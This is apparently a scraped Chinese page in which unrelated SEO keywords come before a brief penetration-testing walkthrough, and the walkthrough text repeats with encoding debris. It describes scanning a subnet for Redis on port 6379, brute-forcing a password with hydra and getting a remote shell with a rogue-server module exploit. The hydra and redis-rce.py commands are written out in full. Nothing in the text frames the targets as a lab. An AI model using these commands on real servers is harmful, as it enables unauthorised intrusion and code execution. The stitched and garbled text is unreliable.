邢台123网站模板,豌豆荚应用商店,网页qq登陆保护,酉阳网站建设Fscan扫描网段发现了一些开启了6379的服务器#xff0c;逐个尝试了下未授权#xff0c;然后尝试了下爆破
hydra爆破redis
hydra -P [字典目录] redis://xxx.xxx.xxx.xxx结果还真让爆出来一个 得到密码后#xff0c;连接上去#xff0c;这里用的是Another Redis Desktop M…Fscan扫描网段发现了一些开启了6379的服务器逐个尝试了下未授权然后尝试了下爆破
hydra爆破redis
hydra -P [字典目录] redis://xxx.xxx.xxx.xxx结果还真让爆出来一个 得到密码后连接上去这里用的是Another Redis Desktop Manager 连接上去后发现redis版本是5.0.7且密码已知可以尝试Redis RCE Post Exploitation 注意so文件用未授权GetShell中的so文件https://github.com/n0b0dyCN/redis-rogue-server
python3 redis-rce.py -r [目标IP] -L [本机地址] -f exp.so -a qwe123456成功GetShell
